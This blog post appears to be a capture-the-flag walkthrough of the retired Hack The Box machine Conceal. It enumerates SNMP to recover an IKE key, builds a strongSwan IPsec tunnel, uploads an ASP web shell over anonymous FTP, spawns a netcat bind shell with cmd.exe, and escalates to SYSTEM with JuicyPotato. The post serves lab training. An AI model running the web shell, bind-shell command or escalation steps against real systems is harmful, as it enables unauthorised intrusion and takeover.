This post documents the complete walkthrough of Conceal, a retired vulnerable VM created by bashlogic, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Conceal is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.116 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-03-05 01:30:40 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 161/udp on 10.10.10.116

Interesting! There’s only one open port 161/udp , which is SNMP. For the first time, I didn’t use nmap to perform further enumeration.

Simple Network Management Protocol

Let’s use snmp-check and see what we can find.

# snmp-check -v2c -c public 10.10.10.116 snmp-check v1.9 - SNMP enumerator Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) [+] Try to connect to 10.10.10.116:161 using SNMPv2c and community 'public' [*] System information: Host IP address : 10.10.10.116 Hostname : Conceal Description : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free) Contact : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43 Location : - Uptime snmp : 00:01:20.64 Uptime system : 00:00:56.07 System date : 2019-3-7 02:41:00.0 Domain : WORKGROUP [*] User accounts: Guest Destitute Administrator DefaultAccount [*] Network information: IP forwarding enabled : no Default TTL : 128 TCP segments received : 2 TCP segments sent : 1 TCP segments retrans : 0 Input datagrams : 251 Delivered datagrams : 269 Output datagrams : 241 [*] Network interfaces: Interface : [ up ] Software Loopback Interface 1 Id : 1 Mac Address : ::::: Type : softwareLoopback Speed : 1073 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] WAN Miniport (IKEv2) Id : 2 Mac Address : ::::: Type : unknown Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ down ] WAN Miniport (PPTP) Id : 3 Mac Address : ::::: Type : unknown Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ down ] Microsoft Kernel Debug Network Adapter Id : 4 Mac Address : ::::: Type : ethernet-csmacd Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ down ] WAN Miniport (L2TP) Id : 5 Mac Address : ::::: Type : unknown Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ down ] Teredo Tunneling Pseudo-Interface Id : 6 Mac Address : 00:00:00:00:00:00 Type : unknown Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ down ] WAN Miniport (IP) Id : 7 Mac Address : ::::: Type : ethernet-csmacd Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ down ] WAN Miniport (SSTP) Id : 8 Mac Address : ::::: Type : unknown Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ down ] WAN Miniport (IPv6) Id : 9 Mac Address : ::::: Type : ethernet-csmacd Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ up ] Intel(R) 82574L Gigabit Network Connection Id : 10 Mac Address : 00:50:56:b9:8f:fa Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 17694 Out octets : 30257 Interface : [ down ] WAN Miniport (PPPOE) Id : 11 Mac Address : ::::: Type : ppp Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ down ] WAN Miniport (Network Monitor) Id : 12 Mac Address : ::::: Type : ethernet-csmacd Speed : 0 Mbps MTU : 0 In octets : 0 Out octets : 0 Interface : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000 Id : 13 Mac Address : 00:50:56:b9:8f:fa Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 17694 Out octets : 30257 Interface : [ up ] Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000 Id : 14 Mac Address : 00:50:56:b9:8f:fa Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 17694 Out octets : 30257 Interface : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000 Id : 15 Mac Address : 00:50:56:b9:8f:fa Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 17694 Out octets : 30257 [*] Network IP: Id IP Address Netmask Broadcast 10 10.10.10.116 255.255.255.0 1 1 127.0.0.1 255.0.0.0 1 [*] Routing information: Destination Next hop Mask Metric 0.0.0.0 10.10.10.2 0.0.0.0 281 10.10.10.0 10.10.10.116 255.255.255.0 281 10.10.10.116 10.10.10.116 255.255.255.255 281 10.10.10.255 10.10.10.116 255.255.255.255 281 127.0.0.0 127.0.0.1 255.0.0.0 331 127.0.0.1 127.0.0.1 255.255.255.255 331 127.255.255.255 127.0.0.1 255.255.255.255 331 224.0.0.0 127.0.0.1 240.0.0.0 331 255.255.255.255 127.0.0.1 255.255.255.255 331 [*] TCP connections and listening ports: Local address Local port Remote address Remote port State 0.0.0.0 21 0.0.0.0 0 listen 0.0.0.0 80 0.0.0.0 0 listen 0.0.0.0 135 0.0.0.0 0 listen 0.0.0.0 445 0.0.0.0 0 listen 0.0.0.0 49664 0.0.0.0 0 listen 0.0.0.0 49665 0.0.0.0 0 listen 0.0.0.0 49666 0.0.0.0 0 listen 0.0.0.0 49667 0.0.0.0 0 listen 0.0.0.0 49668 0.0.0.0 0 listen 0.0.0.0 49669 0.0.0.0 0 listen 0.0.0.0 49670 0.0.0.0 0 listen 10.10.10.116 139 0.0.0.0 0 listen [*] Listening UDP ports: Local address Local port 0.0.0.0 161 0.0.0.0 500 0.0.0.0 4500 0.0.0.0 5353 0.0.0.0 5355 0.0.0.0 63602 10.10.10.116 137 10.10.10.116 138 [*] Network services: Index Name 0 Power 1 Server 2 Themes 3 IP Helper 4 DNS Client 5 Data Usage 6 Superfetch 7 DHCP Client 8 Time Broker 9 Workstation 10 SNMP Service 11 User Manager 12 VMware Tools 13 CoreMessaging 14 Plug and Play 15 Print Spooler 16 Windows Audio 17 Task Scheduler 18 Windows Search 19 Windows Update 20 Windows Firewall 21 CNG Key Isolation 22 COM+ Event System 23 Windows Event Log 24 IPsec Policy Agent 25 Volume Shadow Copy 26 Group Policy Client 27 RPC Endpoint Mapper 28 Device Setup Manager 29 Network List Service 30 System Events Broker 31 User Profile Service 32 Base Filtering Engine 33 Local Session Manager 34 Microsoft FTP Service 35 TCP/IP NetBIOS Helper 36 Cryptographic Services 37 Device Install Service 38 Tile Data model server 39 COM+ System Application 40 Diagnostic Service Host 41 WMI Performance Adapter 42 Shell Hardware Detection 43 State Repository Service 44 VMware Snapshot Provider 45 Diagnostic Policy Service 46 Network Connection Broker 47 Security Accounts Manager 48 Network Location Awareness 49 Windows Connection Manager 50 Windows Font Cache Service 51 Remote Procedure Call (RPC) 52 DCOM Server Process Launcher 53 Windows Audio Endpoint Builder 54 Application Host Helper Service 55 Network Store Interface Service 56 Client License Service (ClipSVC) 57 Distributed Link Tracking Client 58 System Event Notification Service 59 World Wide Web Publishing Service 60 Portable Device Enumerator Service 61 Windows Defender Antivirus Service 62 Windows Management Instrumentation 63 Windows Process Activation Service 64 Distributed Transaction Coordinator 65 IKE and AuthIP IPsec Keying Modules 66 Microsoft Account Sign-in Assistant 67 VMware CAF Management Agent Service 68 VMware Physical Disk Helper Service 69 Background Tasks Infrastructure Service 70 Program Compatibility Assistant Service 71 VMware Alias Manager and Ticket Service 72 Connected User Experiences and Telemetry 73 WinHTTP Web Proxy Auto-Discovery Service 74 Windows Defender Security Centre Service 75 Windows Push Notifications System Service 76 Windows Defender Antivirus Network Inspection Service [*] Processes: Id Status Name Path Parameters 1 running System Idle Process 4 running System 308 running smss.exe 368 running svchost.exe C:\Windows\system32\ -k LocalService 376 running svchost.exe C:\Windows\system32\ -k netsvcs 392 running csrss.exe 468 running wininit.exe 488 running csrss.exe 568 running winlogon.exe 592 running services.exe 620 running lsass.exe C:\Windows\system32\ 696 running fontdrvhost.exe 704 running fontdrvhost.exe 756 running svchost.exe C:\Windows\system32\ -k DcomLaunch 812 running svchost.exe C:\Windows\system32\ -k RPCSS 884 running vmacthlp.exe C:\Program Files\VMware\VMware Tools\ 904 running dwm.exe 952 running svchost.exe C:\Windows\System32\ -k LocalServiceNetworkRestricted 972 running svchost.exe C:\Windows\system32\ -k LocalServiceNoNetwork 1000 running svchost.exe C:\Windows\System32\ -k LocalSystemNetworkRestricted 1164 running svchost.exe C:\Windows\System32\ -k NetworkService 1172 running svchost.exe C:\Windows\System32\ -k LocalServiceNetworkRestricted 1264 running svchost.exe C:\Windows\System32\ -k LocalServiceNetworkRestricted 1272 running svchost.exe C:\Windows\system32\ -k LocalServiceNetworkRestricted 1368 running spoolsv.exe C:\Windows\System32\ 1588 running svchost.exe C:\Windows\system32\ -k appmodel 1668 running Memory Compression 1708 running dllhost.exe C:\Windows\system32\ /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} 1740 running svchost.exe C:\Windows\system32\ -k apphost 1768 running svchost.exe C:\Windows\System32\ -k utcsvc 1780 running svchost.exe C:\Windows\system32\ -k ftpsvc 1836 running SecurityHealthService.exe 1852 running snmp.exe C:\Windows\System32\ 1868 running VGAuthService.exe C:\Program Files\VMware\VMware Tools\VMware VGAuth\ 1888 running vmtoolsd.exe C:\Program Files\VMware\VMware Tools\ 1916 running ManagementAgentHost.exe C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\ 1932 running svchost.exe C:\Windows\system32\ -k iissvcs 1952 running MsMpEng.exe 2124 running sysprep.exe Sysprep\ /respecialize /quiet 2336 running svchost.exe C:\Windows\system32\ -k NetworkServiceNetworkRestricted 2424 running powershell.exe -exec bypass -file c:\admin_checks\checks.ps1 2536 running taskhostw.exe SYSTEM 2684 running conhost.exe \??\C:\Windows\system32\ 0x4 2704 running dllhost.exe C:\Windows\system32\ /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} [*] Storage information: Description : ["C:\\ Label: Serial Number 9606be7b"] Device id : [#<SNMP::Integer:0x00005571326fd1e8 @value=1>] Filesystem type : ["unknown"] Device unit : [#<SNMP::Integer:0x000055713252e3d0 @value=4096>] Memory size : 59.51 GB Memory used : 10.70 GB Description : ["D:\\"] Device id : [#<SNMP::Integer:0x0000557132711b20 @value=2>] Filesystem type : ["unknown"] Device unit : [#<SNMP::Integer:0x0000557132752be8 @value=0>] Memory size : 0 bytes Memory used : 0 bytes Description : ["Virtual Memory"] Device id : [#<SNMP::Integer:0x000055713276e118 @value=3>] Filesystem type : ["unknown"] Device unit : [#<SNMP::Integer:0x000055713277fb48 @value=65536>] Memory size : 3.12 GB Memory used : 803.44 MB Description : ["Physical Memory"] Device id : [#<SNMP::Integer:0x000055713279aec0 @value=4>] Filesystem type : ["unknown"] Device unit : [#<SNMP::Integer:0x00005571327c1318 @value=65536>] Memory size : 2.00 GB Memory used : 837.12 MB [*] File system information: Index : 1 Mount point : Remote mount point : - Access : 1 Bootable : 0 [*] Device information: Id Type Status Descr 1 unknown running Microsoft XPS Document Writer v4 2 unknown running Microsoft Print To PDF 3 unknown running Microsoft Shared Fax Driver 4 unknown running Unknown Processor Type 5 unknown running Unknown Processor Type 6 unknown unknown Software Loopback Interface 1 7 unknown unknown WAN Miniport (IKEv2) 8 unknown unknown WAN Miniport (PPTP) 9 unknown unknown Microsoft Kernel Debug Network Adapter 10 unknown unknown WAN Miniport (L2TP) 11 unknown unknown Teredo Tunneling Pseudo-Interface 12 unknown unknown WAN Miniport (IP) 13 unknown unknown WAN Miniport (SSTP) 14 unknown unknown WAN Miniport (IPv6) 15 unknown unknown Intel(R) 82574L Gigabit Network Connection 16 unknown unknown WAN Miniport (PPPOE) 17 unknown unknown WAN Miniport (Network Monitor) 18 unknown unknown Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer 19 unknown unknown Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler- 20 unknown unknown Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer L 21 unknown unknown D:\ 22 unknown running Fixed Disk 23 unknown running IBM enhanced (101- or 102-key) keyboard, Subtype=(0) [*] Software components: Index Name 1 Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 2 VMware Tools 3 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 [*] IIS server information: TotalBytesSentLowWord : 0 TotalBytesReceivedLowWord : 0 TotalFilesSent : 0 CurrentAnonymousUsers : 0 CurrentNonAnonymousUsers : 0 TotalAnonymousUsers : 0 TotalNonAnonymousUsers : 0 MaxAnonymousUsers : 0 MaxNonAnonymousUsers : 0 CurrentConnections : 0 MaxConnections : 0 ConnectionAttempts : 0 LogonAttempts : 0 Gets : 0 Posts : 0 Heads : 0 Others : 0 CGIRequests : 0 BGIRequests : 0 NotFoundErrors : 0

You can see that an IKE service is actually present at 500/udp among other services. Somehow, the rest of the services are concealed. I take back my word that I don’t need nmap this time.

Let’s use nmap to scan for the IKE version.

# nmap -sU -p 500 --script ike-version 10.10.10.116 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 02:41 UTC Nmap scan report for 10.10.10.116 Host is up (0.18s latency). PORT STATE SERVICE 500/udp open isakmp | ike-version: | vendor_id: Microsoft Windows 8 | attributes: | MS NT5 ISAKMPOAKLEY | RFC 3947 NAT-T | draft-ietf-ipsec-nat-t-ike-02

| IKE FRAGMENTATION | MS-Negotiation Discovery Capable |_ IKE CGA version 1 Service Info: OS: Windows 8; CPE: cpe:/o:microsoft:windows:8, cpe:/o:microsoft:windows Nmap done: 1 IP address (1 host up) scanned in 9.41 seconds

It appears to be using IKEv1. Alternatively, we can use ike-scan to determine the version.

# ike-scan 10.10.10.116 -M Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 10.10.10.116 Main Mode Handshake returned HDR=(CKY-R=0a8ddd4d8222f452) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8) VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T) VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02

) VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation) VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable) VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1) Ending ike-scan 1.9.4: 1 hosts scanned in 0.208 seconds (4.81 hosts/sec). 1 returned handshake; 0 returned notify

OK, I’m pretty sure it’s IKEv1. IKEv1 has two phases, Phase 1 operates in Main Mode (6-way handshake) or Aggressive Mode (3-way handshake) while Phase 2 operates in Quick Mode.

At the very beginning of the snmp-check ’s output lies the pre-shared key for authentication during Phase 1 (Main Mode) of the Internet Key Exchange (IKE). It’s easy to miss that if you don’t know what you are looking for.

IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43

It turns out that this is not the shared secret. Instead, this is the MD5 hash of the password. A quick search for the hash in online cracker reveals the password to be Dudecake1!

IPSec - Internet Key Exchange (IKE) and Encapulating Security Payload (ESP)

Good thing Linux is well-eqipped to take advantage of this, all we have to do is to install strongSwan. The problem now is to find the correct configuration because IPSec is complex and we don’t know the configuration on the “right” side as per strongSwan’s parlance.

Well, we know enough security parameters for Phase 1 - Main Mode from ike-scan . We can more or less “guess” the security parameters for Phase 2 - Quick Mode. We also want to establish the transport mode of IPSec because we are already in a VPN (OpenVPN) and the connection is between my HTB’s assigned IP address and that of Conceal’s.

ipsec.conf

With that in mind, let’s construct the connection.

/etc/ipsec.conf

config setup conn %default inactivity=1h keyexchange=ikev1 ike=3des-sha1-modp1024! esp=3des-sha1 authby=secret conn conceal left=%any right=10.10.10.116 rightsubnet=10.10.10.116[tcp/%any] type=transport auto=add

The ike parameter specifies the cipher suite that we want to use. This is not new to us because this is the cipher suite exposed by ike-scan earlier on.

The inactivity parameter specifies the timeout interval, after which a CHILD_SA is closed if it did not send or receive any traffic.

The esp parameter is the only parameter that we need to guess. Judging from Microsoft’s track history of not complying with security recommendations or open standards in order to be backward compatible, this can be easily guessed.

The rightsubnet parameter specifies we are connecting securely (over IPSec) to Conceal for all TCP ports. Recall from SNMP that Conceal is also listening on 21/tcp , 80/tcp , 139/tcp , and 445/tcp .

The type parameter specifies the type of connection we want to establish. In this case, we want to establish transport mode.

ipsec.secrets

Simple and self-explanatory.

/etc/ipsec.secrets

: PSK "Dudecake1!"

Establishing IPSec Transport Mode

Time to establish the connection!

When that’s done, let’s test it out with my browser since 80/tcp is open.

We can now re-run nmap on the open ports. Note that we need to use nmap ’s connect scan with the -sT switch because,

Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients, and most other network-enabled applications use to establish a connection.

# nmap -n -v -Pn -sT -p21,80,139,445 10.10.10.116 -A --reason -oN nmap.txt ... PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 80/tcp open http syn-ack Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? syn-ack ... Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-03-07 00:53:56 |_ start_date: 2019-03-06 23:06:41

To be honest, I could have skipped this step. I did it to show some love to nmap .

Directory/File Enumeration

Finally, we can continue with our enumeration journey. Let’s start with wfuzz .

# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404 http://10.10.10.116/FUZZ ******************************************************** * Wfuzz 2.2.11 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.116/FUZZ Total requests: 4593 ================================================================== ID Response Lines Word Chars Payload ================================================================== 004186: C=301 1 L 10 W 150 Ch "upload" Total time: 233.0655 Processed Requests: 4593 Filtered Requests: 4592 Requests/sec.: 19.70690

Hmm. Where can I upload files? FTP of course.

Here’s proof that the file was successfully uploaded.

Armed with this knowledge, we can upload a simple ASP file that executes commands remotely.

hello.asp

< % Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") Function getCommandOutput ( theCommand ) Dim objShell , objCmdExec Set objShell = CreateObject("WScript.Shell") Set objCmdExec = objshell.exec(thecommand) getCommandOutput = objCmdExec.StdOut.ReadAll end Function % > <html> <body> <form action= "" method= "GET" > <input type= "text" name= "cmd" size= 45 value= "<%= szCMD %>" > <input type= "submit" value= "Run" > </form> <pre> < %= "\\" & oScriptNet . ComputerName & "\" & oScriptNet . UserName % > </pre> <br> <b> Command Output: </b> <br> <pre> < % szCMD = request("cmd") thisDir = getCommandOutput("cmd / c " & szCMD ) Response . Write Server . HTMLEncode ( thisDir )% > </pre> <br> </body> </html>

While we are at it, we might as well upload nc.exe to see if we can spawn a bind shell because I noticed that there’s a script that deletes whatever is in /upload rather quickly.

Remote command execution unlocked! Time to spawn that bind shell.

http://10.10.10.116/upload/hello.asp?cmd=c%3A%5Cinetpub%5Cwwwroot%5Cupload%5Cnc.exe+-lnvp+12345+-e+cmd.exe

Awesome.

The proof.txt is at Destitute ’s desktop.

Privilege Escalation

During enumeration of destitute ’s account, I notice that the account has these privileges.

I smell potato cooking! There were different types of potato uncovered in my reseach and oh boy, in the end the “juicy” one seems the most promising because of the various command switches available. More importantly, I can change to a different COM server other than BITS.

For some reason I couldn’t recall, I decided to go for UsoSvc ’s CLSID, which can be found here. Earlier on, I’d already established that Conceal is a Windows 10 Enterprise.

The CLSID of UsoSvc is {B91D5831-B1BD-4608-8198-D72E155020F7} . We are now set to run the exploit.

I upload the exploit jp.exe to C:\inetpub\wwwroot\upload via FTP.

Then I run the exploit.

Meanwhile at my nc listener, a SYSTEM shell appears.